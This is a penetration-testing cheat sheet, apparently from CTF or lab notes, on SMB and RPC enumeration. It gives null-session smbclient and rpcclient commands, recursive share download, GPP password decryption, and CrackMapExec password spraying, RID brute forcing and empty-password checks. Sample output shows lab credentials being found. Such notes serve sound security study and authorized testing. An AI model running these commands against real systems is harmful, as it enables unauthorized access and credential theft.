SMB & RPC Enumeration


enum4linux IP


rpcclient -U ''

rpcclient> enumdomusers

hit tab twice

rpcclient> querydispinfo


Null session

smbclient // -N
smbclient -L //IP -U '' -P ''

Connect to a share

Connect and download recursively all resources

smbclient //IP/IPC$  

smbclient //

smb: \> recurse on
smb: \> prompt off
smb: \> mget *

SMB Null session

smbclient -L //IP -U '' -P ''


smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H 

Group Polict Preferences (GPP)

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ  

CrackMapExec smb

Determine Password Policy

crackmapexec smb --pass-pol
└─# crackmapexec smb -u ./users.txt -p ./passwords.txt 
SMB   445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB   445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent 

SID bruteforcing

crackmapexec smb -u hazard -p stealth1agent --rid-brute

Password bruteforce

Users / Users

Try out first username combinations as a password

crackmapexec smb -u ./users.txt -p ./users.txt  --continue-on-success

Users / Username (1)

try username as the password (only one attempt per user)

crackmapexec smb -u ./users.uniq -p ./users.uniq --continue-on-success --no-bruteforce 

Users with empty password

try users with empty passwords

└─# crackmapexec smb -u ./users.uniq -p '' --continue-on-success --no-bruteforce 

Last updated